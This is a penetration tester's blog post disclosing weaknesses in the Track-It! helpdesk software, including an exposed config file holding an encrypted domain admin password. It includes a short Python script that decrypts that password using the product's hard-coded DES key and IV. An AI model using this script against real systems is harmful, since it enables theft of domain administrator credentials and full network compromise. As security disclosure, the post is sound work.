Today during a Penetration Test of a client I came across a piece of software called “Track-It!” by Numara, which has since been acquired by BMC. This application is used by IT Helpdesks to offer centralised control of assets, so it was definitely worth a look from a testing point of view. I found an open (readable by Domain Users) network share on the installation server named “TrackIt” which internally exposed configuration files such as trackit.cfg, which contained interesting lines such as:
Seeing a line of base64 data after the phrase DomainAdminPass is definitely interesting enough to catch my attention. During the assessment I was able to abuse these configuration files to retrieve the plaintext password and fully compromise the client. A little post-assessment research shows that the vulnerability I exploited is known and already has a Metasploit module.
However, I didn’t have Metasploit available during this assessment, as I was engaged in a desktop breakout test. I was, however, able to retrieve the encrypted key and write a small Python script to decrypt it, which I’ll share here:
import base64
from Crypto.Cipher import DES  # pycryptodome (the PyCrypto successor) provides this module

# Base64 value copied from the DomainAdminPass line of the exposed trackit.cfg
DomainAdminPass = "l4LCPmUqYdS2mWkeTmHn6w=="
cipher_text = base64.b64decode(DomainAdminPass)

# Track-It! uses single DES in CBC mode with the product name as both the key and the IV
desa = DES.new(b'NumaraTI', DES.MODE_CBC, iv=b'NumaraTI')

# The result is raw bytes; any trailing block padding is left in place
print(desa.decrypt(cipher_text))
Provided for you here just in case you stumble across one of these configuration files or this tool in the future. Oh, and yeah, the key and IV were both the company/product name – nice move guys.
It turns out the software has an unauthenticated file upload leading to remote code execution, hard-coded credentials for the database and weak cryptography protecting exposed domain administrator credentials, amongst other issues. An easy full domain compromise for the attackers and no support for the defenders. If you have BMC/Numara Track-It! deployed in your enterprise I highly recommend you check out the CERT page and do a full review of the security of the installation. These issues affect a spread of versions of this software, and any exposure of the configuration file could lead to a full domain compromise.